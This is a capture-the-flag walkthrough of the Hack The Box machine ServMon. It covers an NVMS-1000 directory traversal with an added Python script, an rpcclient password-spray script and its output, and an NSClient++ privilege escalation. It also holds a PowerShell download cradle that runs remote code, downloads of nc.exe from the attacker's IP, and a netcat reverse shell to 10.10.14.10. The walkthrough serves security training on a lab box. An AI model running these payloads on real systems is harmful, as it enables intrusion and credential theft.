Name: | ServMon |
---|---|
Release Date: | 11 Apr 2020 |
Retire Date: | 20 Jun 2020 |
OS: | Windows |
Base Points: | Easy - Retired [0] |
Creator: | dmw0ng |
Again, we start with nmap -sC -sV -Pn -p- -oA ./ServMon 10.10.10.184
$ nmap -sC -sV -Pn -p- -oA ./ServMon 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-16 10:02 EDT
Nmap scan report for 10.10.10.184
Host is up (0.025s latency).
Not shown: 65517 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
|
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
5666/tcp open tcpwrapped
6063/tcp open tcpwrapped
6699/tcp open tcpwrapped
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| workers
|_ jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
We've got a lot open on this one: FTP, SSH, HTTP, RPC/SMB, HTTPS on 8443 and a few more. Let's start with FTP, since nmap reports that anonymous login is allowed, and see what goodies are accessible. Logging in as anonymous shows a Users directory with two folders, Nadine and Nathan, each holding a single TXT file. Get them both.
The one in Nadine's folder says:
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
And Nathan's says:
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
That appears to be everything we can get from FTP. Let's take a look at the HTTP site, which is NVMS-1000, a CCTV/NVR surveillance management system. Don't bother trying default credentials; I already tried them and failed, and I can't get anything else working on HTTP. Let's jump to HTTPS on 8443 and see if we have better luck. That turns out to be NSClient++, a Windows monitoring agent for Nagios. Let's searchsploit NVMS and see if something jumps out.
OK. We have a directory traversal to work with here. 47774.txt (also on Exploit-DB) basically says: intercept the request for the main page and change the target path. Time to fire up Burp Suite. Intercept the request, send it to Repeater, change the request line to GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 and fire away. Repeater sends the path exactly as typed, which matters: a browser or a normal HTTP client would collapse the ../ segments before they ever reached the server.
Vulnerability confirmed: the response body is the contents of win.ini. The Confidential.txt file in Nadine's FTP folder says she left the passwords on Nathan's Desktop, so let's try GETting that file next. Change the request line again, this time to:
GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
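The same traversal request, scripted so it can be repeated for any file, as an added example that is not code from the original write-up or from the Exploit-DB entry. It talks to the target over a raw socket on purpose: HTTP client libraries, and curl unless given --path-as-is, normalise the ../ segments out of the path before sending and silently defeat the test. The host, port and file paths come from the write-up; the function names and the sample response are this example's own constructions.

```python
"""Added example: reproduce the NVMS-1000 directory-traversal request over a
raw socket so the "../" segments reach the server untouched."""
import socket

TARGET_HOST = "10.10.10.184"   # from the write-up
TARGET_PORT = 80

# Section headers present in every Windows win.ini; enough to recognise a hit.
WIN_INI_MARKERS = (b"[fonts]", b"[extensions]", b"[mci extensions]")


def build_request(target_path: str, depth: int = 12, host: str = TARGET_HOST) -> bytes:
    """Build the raw request line the write-up used: GET /../ (x depth) <path> HTTP/1.1."""
    path = "/" + "../" * depth + target_path.lstrip("/")
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()


def parse_response(raw: bytes):
    """Split a raw HTTP response into (status_code, body). No chunked-encoding
    support; NVMS-1000 answers with Content-Length and Connection: close."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0]          # e.g. b"HTTP/1.1 200 OK"
    return int(status_line.split()[1]), body


def looks_like_win_ini(body: bytes) -> bool:
    """Heuristic confirmation that the body really is C:\\Windows\\win.ini."""
    return any(marker in body for marker in WIN_INI_MARKERS)


def fetch(target_path: str, host: str = TARGET_HOST, port: int = TARGET_PORT,
          timeout: float = 5.0):
    """Send the traversal request to the live target and return (status, body)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(target_path, host=host))
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return parse_response(b"".join(chunks))


def check_traversal(target_path: str = "windows/win.ini", fetcher=fetch) -> bool:
    """True when the server returns 200 and the body looks like win.ini.
    `fetcher` is injectable so the logic can be exercised without a network."""
    status, body = fetcher(target_path)
    return status == 200 and looks_like_win_ini(body)


# Constructed response, standing in for the live server (hypothetical content).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-type: text/html\r\nContent-Length: 92\r\n"
    b"Connection: close\r\nAuthInfo: \r\n\r\n"
    b"; for 16-bit app support\r\n[fonts]\r\n[extensions]\r\n"
    b"[mci extensions]\r\n[files]\r\n[Mail]\r\nMAPI=1\r\n"
)

if __name__ == "__main__":
    # Live use: confirm the hole with win.ini, then pull the file the FTP note pointed at.
    if check_traversal():
        status, body = fetch("Users/Nathan/Desktop/Passwords.txt")
        print(body.decode(errors="replace"))
```

Run it against the live box and the __main__ block performs exactly the two Repeater requests from the text, win.ini first as the proof, then Passwords.txt. Keep the depth generous (12 here, as in the write-up): extra ../ segments past the drive root are harmless on Windows, too few and the request never leaves C:\ of the web root.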
And we get the list of passwords on Nathan's Desktop.
The list is:
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
Now we can password-spray these against everything that accepts Windows credentials: SMB/RPC, SSH and the two web applications. To start, create users.txt with administrator, Nathan and Nadine in it, and passwords.txt with the seven passwords above. It's a little funky, but here's the quick and dirty bash script; it tries every user/password pair over SMB with rpcclient and prints whatever the server says. (On a real target, check the account lockout threshold before throwing seven passwords at each account.)
#!/bin/bash
# Spray every password in passwords.txt against every user in users.txt over SMB/RPC.
# "Account Name: ..." in the output means the logon succeeded;
# NT_STATUS_LOGON_FAILURE means it did not.
while read -r u; do
    echo "[*] user: $u"
    while read -r p; do
        echo "$u % $p"
        rpcclient -U "$u%$p" -c "getusername;quit" 10.10.10.184
    done < passwords.txt
done < users.txt
RESULT:
$ ./spray.sh
[*] user: administrator
administrator % 1nsp3ctTh3Way2Mars!
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
administrator % Th3r34r3To0M4nyTrait0r5!
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
administrator % B3WithM30r4ga1n5tMe
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
administrator % L1k3B1gBut7s@W0rk
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
administrator % 0nly7h3y0unGWi11F0l10w
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
administrator % IfH3s4b0Utg0t0H1sH0me
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
administrator % Gr4etN3w5w17hMySk1Pa5$
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
[*] user: Nathan
Nathan % 1nsp3ctTh3Way2Mars!
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nathan % Th3r34r3To0M4nyTrait0r5!
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nathan % B3WithM30r4ga1n5tMe
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nathan % L1k3B1gBut7s@W0rk
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nathan % 0nly7h3y0unGWi11F0l10w
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nathan % IfH3s4b0Utg0t0H1sH0me
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nathan % Gr4etN3w5w17hMySk1Pa5$
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
[*] user: Nadine
Nadine % 1nsp3ctTh3Way2Mars!
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nadine % Th3r34r3To0M4nyTrait0r5!
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nadine % B3WithM30r4ga1n5tMe
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nadine % L1k3B1gBut7s@W0rk
Account Name: Nadine, Authority Name: SERVMON
Nadine % 0nly7h3y0unGWi11F0l10w
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nadine % IfH3s4b0Utg0t0H1sH0me
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Nadine % Gr4etN3w5w17hMySk1Pa5$
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Notice that when it got to Nadine % L1k3B1gBut7s@W0rk the reply was Account Name: Nadine, Authority Name: SERVMON instead of NT_STATUS_LOGON_FAILURE. That's a successful logon, so we have Nadine's credentials. SSH in with them and we've got ourselves a foothold. (You can do the same spray with Metasploit's ssh_login module, auxiliary/scanner/ssh/ssh_login, but again, MSF makes us lazy. Moving on.)
Looking around on the box, and knowing that NVMS and NSClient++ are installed, I find nsclient.ini under C:\Program Files\NSClient++. Surprise: it holds another password, ew2x6SsGTxjRwXOT, for the NSClient++ web interface. Unfortunately it also restricts allowed hosts to 127.0.0.1, so the 8443 interface only accepts connections from localhost, which is not very helpful from where we are right now. Let's keep looking.
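Why the localhost restriction matters, and why a port forward gets around it, as an added example that is not code from the write-up or from NSClient++: parse the two nsclient.ini settings that gate the web interface and check a source address against allowed hosts. The INI layout follows NSClient++'s default template, where [/settings/default] holds password and allowed hosts; the sample text is constructed here around the password quoted above, and the function names are this example's own assumptions.

```python
"""Added example: read the NSClient++ web password and "allowed hosts" from
nsclient.ini and decide whether a given source address would get through."""
import configparser
import io
import ipaddress

# Constructed stand-in for C:\Program Files\NSClient++\nsclient.ini (layout assumed
# from the NSClient++ default template; only the password is from the write-up).
SAMPLE_INI = """\
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1

[/settings/WEB/server]
; PORT NUMBER - Port to use for WEB server.
port = 8443
"""


def load_ini(text: str) -> configparser.ConfigParser:
    """Parse nsclient.ini. Section names contain '/' and keys contain spaces;
    configparser copes with both. Interpolation is off so '%' in passwords is safe."""
    cp = configparser.ConfigParser(interpolation=None, inline_comment_prefixes=(";",))
    cp.read_file(io.StringIO(text))
    return cp


def web_settings(cp: configparser.ConfigParser):
    """Return (password, port, [allowed host entries]) for the web interface."""
    default = cp["/settings/default"]
    password = default.get("password", "")
    hosts = [h.strip() for h in default.get("allowed hosts", "").split(",") if h.strip()]
    port = cp.get("/settings/WEB/server", "port", fallback="8443")
    return password, int(port), hosts


def is_allowed(source_ip: str, allowed: list) -> bool:
    """Match a source address against entries that may be bare IPs or CIDR ranges."""
    addr = ipaddress.ip_address(source_ip)
    for entry in allowed:
        try:
            if addr in ipaddress.ip_network(entry, strict=False):
                return True
        except ValueError:
            # Hostnames would need resolving first; treat anything unparsable as no match.
            continue
    return False


def reachable_from(source_ip: str, ini_text: str = SAMPLE_INI) -> bool:
    """Would a request arriving from source_ip pass the allowed-hosts check?"""
    _, _, allowed = web_settings(load_ini(ini_text))
    return is_allowed(source_ip, allowed)


if __name__ == "__main__":
    password, port, allowed = web_settings(load_ini(SAMPLE_INI))
    print(f"web password: {password}  port: {port}  allowed hosts: {allowed}")
    for ip in ("10.10.14.10", "127.0.0.1"):   # attacker box vs. loopback
        print(f"{ip}: {'allowed' if is_allowed(ip, allowed) else 'blocked'}")
```

With allowed hosts = 127.0.0.1 only a connection whose source address is the loopback passes, which is exactly what an SSH -L forward provides: the request leaves sshd on the box with source 127.0.0.1. The CIDR handling is there because real deployments usually carry a comma-separated list of ranges rather than a single address.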
What version of NSClient is running?
nadine@SERVMON C:\Program Files\NSClient++>nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64
OH! Now we're getting somewhere. There is a privilege escalation path for NSClient++ version 0.5.2.35, documented on Exploit-DB: the web interface's external scripts feature runs whatever command you configure, and it runs it as the service account. Obviously we don't want to reboot the system as the exploit suggests, but we will need to restart the service, so let's see whether Nadine is allowed to. A little Google Fu turns up https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/, which has a nice PowerShell script that reads a service's ACL for us. We just need to get it onto the target, which we do with the Msxml2.XMLHTTP COM object as a download cradle:
$ex=New-Object -ComObject Msxml2.XMLHTTP;$ex.open('GET','http://10.10.14.10/ACL-View.ps1',$false);$ex.send();iex $ex.responseText
and then have a look at the service itself:
Get-Service nscp | fl *
CanStop is True. Strictly, that only says the service accepts stop requests; whether Nadine may send them is decided by the service's DACL, which is what the ACL script (or sc.exe sdshow nscp) shows. On this box it works, as the sc.exe stop/start below confirms. Next we need to reach the 8443 page, which only localhost can, so let's try an SSH tunnel:
ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184
With the tunnel up we can log in at https://localhost:8443 with the password from the INI file; as far as NSClient++ is concerned the connection now comes from 127.0.0.1.
Now we just follow the directions from the Exploit-DB page. I change to C:\Temp and get netcat over to the box.
Next, create the batch file (exploited.bat) containing:
C:\Temp\nc.exe 10.10.14.10 9999 -e cmd.exe
and move it to the target the same way:
PS C:\Temp> $WebClient = New-Object System.Net.WebClient
PS C:\Temp> $WebClient.DownloadFile("http://10.10.14.10/nc.exe","C:\Temp\nc.exe")
PS C:\Temp> $WebClient.DownloadFile("http://10.10.14.10/exploited.bat","C:\Temp\exploited.bat")
After verifying that netcat and our batch file are in place, restart the nscp service.
Now go to the NSClient++ web page, navigate to Settings > External Scripts > Scripts and hit Add New.
In Section give it a name (I used shell), in Key put command, and in Value set the path to our batch file (C:\Temp\exploited.bat).
Once you add it, the Changes button at the top turns red. Select it and hit Save Configuration.
Now that it's added, restart the nscp service so the new external script is loaded (note the service name is nscp):
sc.exe stop nscp
sc.exe start nscp
Once it has restarted, start a netcat listener (nc -lvnp 9999), sign back into the NSClient++ page and go to Console. Under the logs is an input box; type the name of the script you added (in my case shell) and hit Run. Check your listener: the batch file ran as the nscp service account, which for NSClient++ is SYSTEM, so we have a fully privileged shell.